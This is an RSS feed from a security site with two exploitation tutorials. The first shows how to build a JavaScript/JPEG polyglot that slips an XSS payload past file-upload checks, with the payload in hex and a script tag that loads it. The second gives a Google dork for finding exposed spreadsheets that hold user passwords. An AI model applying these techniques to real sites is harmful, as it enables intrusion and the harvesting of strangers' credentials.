<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>exploiting &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/exploiting/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Fri, 08 Sep 2023 00:00:44 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.2</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>exploiting &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Exploiting XSS with Javascript/JPEG Polyglot</title>
		<link>https://en.anonyviet.com/exploiting-xss-with-javascript-jpeg-polyglot/</link>
					<comments>https://en.anonyviet.com/exploiting-xss-with-javascript-jpeg-polyglot/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 08 Sep 2023 00:00:44 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[JavascriptJPEG]]></category>
		<category><![CDATA[Polyglot]]></category>
		<category><![CDATA[XSS]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=13159</guid>

					<description><![CDATA[Just as PNG, JPEG, and DOC are valid file types, polyglot is a combination of two different file types. Example: Phar + JPEG (PHP archive and JPEG file), GIFAR (Gif and Rar file) Javascript + JPEG, etc. Join the channel Telegram belong to AnonyViet ???? Link ???? Apps that only allow certain file types on [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>Just as PNG, JPEG, and DOC are valid file types, polyglot is a combination of two different file types.  Example: Phar + JPEG (PHP archive and JPEG file), GIFAR (Gif and Rar file) Javascript + JPEG, etc.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> ???? <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  ????</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="13159" fifu-featured="1" decoding="async" fetchpriority="high" class="aligncenter wp-image-42616 size-full" src="https://anonyviet.com/wp-content/uploads/2022/07/1_XEFzRbN-eiQnxTujnE0mSA.jpg" alt="Exploiting XSS with Javascript/JPEG Polyglot" title="Exploiting XSS with Javascript/JPEG Polyglot" width="700" height="394" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_XEFzRbN-eiQnxTujnE0mSA.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_XEFzRbN-eiQnxTujnE0mSA-300x169.jpg 300w" sizes="(max-width: 700px) 100vw, 700px" title="Exploiting XSS with Javascript/JPEG Polyglot 14"/></p>
<p>Apps that only allow certain file types on features like file uploads and disallow other file types like .php or .js files because they could allow attackers to upload malicious files on the app.  Applications perform checks for evicting files with double extensions (.jpg.php) or using empty bytes in extensions (.php%00.jpg), filenames (.htaccess, .config,…), and if the signature of the uploaded file also matches its content type.</p>
<p>Different applications use different methods, and polyglot can be used to bypass some of these authentication checks.</p>
<h2 id="ftoc-kien-truc-jpeg" class="ftwp-heading">JPEG Architecture</h2>
<p>A JPEG image is represented as a series of segments where each segment begins with a header.  Each header starts with a byte number.  Payload by header is different depending on the header type.  Common types of JPEG markers are as listed below:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">0xffd8: “Start of Image”,&#13;
0xffe0: “Application Default Header”,&#13;
0xffdb: “Quantization Table”,&#13;
0xffc0: “Start of Frame”,&#13;
0xffc4: “Define Huffman Table”,&#13;
0xffda: “Start of Scan”,&#13;
0xffd9: “End of Image”</pre>
<p>Each binary file contains several headers.  They are important to the file because they identify file-specific information.  Most headers are followed by length information.  This tells us how long that particular segment is.</p>
<p>The header of the image header contains FF D8.  If we don&#8217;t see it, we can assume this is another file.  Another important marker is FF D9 which indicates the end of the image.</p>
<p>To make the payload look like a legitimate JPEG file, we&#8217;ll add the length of the header, the comment header, the empty bytes to the pad, and then the javascript attack vector.</p>
<p>Suppose the attack vector is one <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F10-website-giup-ban-thuc-hanh-ky-nang-hack-xss%2F" class="local-link" rel="noopener">XSS vulnerability</a> <code>*/=alert(“XSS”)/*</code> Converting it to hexadecimal would look like this.</p>
<p><img decoding="async" class="size-full wp-image-42617 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_tl0RmvkwMWXXLaZctB-WXA.jpg" alt="Exploiting XSS with Javascript/JPEG Polyglot 11" width="416" height="335" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_tl0RmvkwMWXXLaZctB-WXA.jpg 416w, https://anonyviet.com/wp-content/uploads/2022/07/1_tl0RmvkwMWXXLaZctB-WXA-300x242.jpg 300w" sizes="(max-width: 416px) 100vw, 416px" title="Exploiting XSS with Javascript/JPEG Polyglot 15"/></p>
<p>Payload in hex:</p>
<p><code>2A 2F 3D 61 6C 65 72 74 28 22 58 53 53 2E 22 29</code></p>
<p>We can use a hex editor to include javascript in the image&#8217;s metadata.  This works because browsers interpret the code when they display images as HTML.</p>
<p><img decoding="async" class="size-full wp-image-42618 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_97wCGHxeo_yv9uJIUm4clA.jpeg" alt="Exploiting XSS with Javascript/JPEG Polyglot 12" width="473" height="266" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_97wCGHxeo_yv9uJIUm4clA.jpeg 473w, https://anonyviet.com/wp-content/uploads/2022/07/1_97wCGHxeo_yv9uJIUm4clA-300x169.jpeg 300w" sizes="(max-width: 473px) 100vw, 473px" title="Exploiting XSS with Javascript/JPEG Polyglot 16"/></p>
<p>I received an image test.jpg and below is the hexdump of test.jpg.  With the help of a ghex editor, we will replace some hex characters and save them.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42619 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_HS9YL0FAk7wSPGplGsK83w.jpg" alt="Exploiting XSS with Javascript/JPEG Polyglot 13" width="1025" height="556" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_HS9YL0FAk7wSPGplGsK83w.jpg 1025w, https://anonyviet.com/wp-content/uploads/2022/07/1_HS9YL0FAk7wSPGplGsK83w-300x163.jpg 300w, https://anonyviet.com/wp-content/uploads/2022/07/1_HS9YL0FAk7wSPGplGsK83w-768x417.jpg 768w, https://anonyviet.com/wp-content/uploads/2022/07/1_HS9YL0FAk7wSPGplGsK83w-750x407.jpg 750w" sizes="auto, (max-width: 1025px) 100vw, 1025px" title="Exploiting XSS with Javascript/JPEG Polyglot 17"/></p>
<p>As we know FF D8 is the start of the image, the next two bytes represent the upcoming two bytes, 00 10 represents the length of the JPEG header which is equivalent to a decimal number of 16 bytes.</p>
<h2 id="ftoc-thoi-gian-tiem" class="ftwp-heading">Injection time</h2>
<p>We will inject the payload between FF E0 and FF DB.  Let&#8217;s start with 2F 2A, which is the hex representation of /*</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42625 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_mv3lnPCjPR-XLFFiNVvtMA.jpg" alt="Exploiting XSS with Javascript/JPEG Polyglot 14" width="1025" height="81" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_mv3lnPCjPR-XLFFiNVvtMA.jpg 1025w, https://anonyviet.com/wp-content/uploads/2022/07/1_mv3lnPCjPR-XLFFiNVvtMA-300x24.jpg 300w, https://anonyviet.com/wp-content/uploads/2022/07/1_mv3lnPCjPR-XLFFiNVvtMA-768x61.jpg 768w, https://anonyviet.com/wp-content/uploads/2022/07/1_mv3lnPCjPR-XLFFiNVvtMA-750x59.jpg 750w" sizes="auto, (max-width: 1025px) 100vw, 1025px" title="Exploiting XSS with Javascript/JPEG Polyglot 18"/></p>
<p>We just replaced the previous 00 10 with 2F 2A and the decimal equivalent of hex 2F 2A is 12074 bytes.  So now <em class="iu">header. header </em>image is changed from 16 bytes to 12074 bytes.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42626 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_5R_HeJdgeQV9vIUSFCilSw.jpg" alt="Exploiting XSS with Javascript/JPEG Polyglot 15" width="397" height="98" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_5R_HeJdgeQV9vIUSFCilSw.jpg 397w, https://anonyviet.com/wp-content/uploads/2022/07/1_5R_HeJdgeQV9vIUSFCilSw-300x74.jpg 300w" sizes="auto, (max-width: 397px) 100vw, 397px" title="Exploiting XSS with Javascript/JPEG Polyglot 19"/></p>
<p>From the screenshot above, we can see the size of the payload is 18 bytes, so we have to remove the remaining bytes with null which is 12074–16–18 = 12040 bytes.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42627 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_a1tqwT8TDI_FENAxG7Q73w.jpg" alt="Exploiting XSS with Javascript/JPEG Polyglot 16" width="668" height="320" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_a1tqwT8TDI_FENAxG7Q73w.jpg 668w, https://anonyviet.com/wp-content/uploads/2022/07/1_a1tqwT8TDI_FENAxG7Q73w-300x144.jpg 300w" sizes="auto, (max-width: 668px) 100vw, 668px" title="Exploiting XSS with Javascript/JPEG Polyglot 20"/></p>
<p>The above commands will read test.jpg, insert the payload between 2F 2A FF DB change hexadecimal into the buffer, add 12040 null bytes and write it to file test_new.jpg.  Now in the ghex editor close the comment tag before FF D9</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42628 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1__xpTlKAEluicg-GSmiHkLw.jpg" alt="Exploiting XSS with Javascript/JPEG Polyglot 17" width="493" height="347" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1__xpTlKAEluicg-GSmiHkLw.jpg 493w, https://anonyviet.com/wp-content/uploads/2022/07/1__xpTlKAEluicg-GSmiHkLw-300x211.jpg 300w" sizes="auto, (max-width: 493px) 100vw, 493px" title="Exploiting XSS with Javascript/JPEG Polyglot 21"/></p>
<pre class="ma mb mc md gt me bt mf"><span id="2954" class="fw kc kd iu mg b do mh mi l mj" data-selectable-paragraph="">Code to execute image as javascript:-</span><span id="958e" class="fw kc kd iu mg b do mk ml mm mn mo mi l mj" data-selectable-paragraph="">&lt;script charset="ISO-8859-1" src="https://anonyviet.com/khai-thac-xss-voi-javascript-jpeg-polyglot/test_new.jpeg"&gt;</span></pre>
<p>On Firefox when using the UTF-8 character set it will corrupt the polyglot when included as a script.  So for the script to work we need to specify the ISO-8859–1 character set on the script tag and it executes fine.</p>
<p>And this is when testing in the browser.</p>
<p><img decoding="async" loading="lazy" class="size-full aligncenter" src="https://media.giphy.com/media/BSoVfZaXQWFjlseWrx/giphy.gif" width="800" height="480" alt="Exploiting XSS with Javascript/JPEG Polyglot 18" title="Exploiting XSS with Javascript/JPEG Polyglot 22"/></p>
<p><strong class="lc iv">Polyglot</strong> <strong class="lc iv">javascript/jpeg</strong> Ours is already working.</p>
<p>Update: <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fbugzilla.mozilla.org%2Fshow_bug.cgi%3Fid%3D1288361" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Mozilla fixed this in Firefox 51</a> and later versions.</p>
</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;42615&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;0&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;0&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 0\/5 - (0 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;title&quot;:&quot;Khai th\u00e1c XSS v\u1edbi Javascript\/JPEG Polyglot&quot;,&quot;width&quot;:&quot;0&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>
            <span class="kksr-muted">Rate this post</span>
    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/exploiting-xss-with-javascript-jpeg-polyglot/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2022/07/1_XEFzRbN-eiQnxTujnE0mSA.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Exploiting Passwords stored on Websites with Google Dork</title>
		<link>https://en.anonyviet.com/exploiting-passwords-stored-on-websites-with-google-dork/</link>
					<comments>https://en.anonyviet.com/exploiting-passwords-stored-on-websites-with-google-dork/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 01 Feb 2023 00:15:19 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Dork]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Passwords]]></category>
		<category><![CDATA[stored]]></category>
		<category><![CDATA[Websites]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7638</guid>

					<description><![CDATA[The instructions below will help you find the user password easily through google search engine and keywords Join the channel Telegram of the AnonyViet 👉 Link 👈 You guys come in http://google.com.vntype the command below: inurl:wp-content/uploads filetype:xls &#124; filetype:xlsx password Google will list us the excel files that store user passwords. My simple task is [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p><img decoding="async" class="alignnone" src="data:image/jpeg;base64,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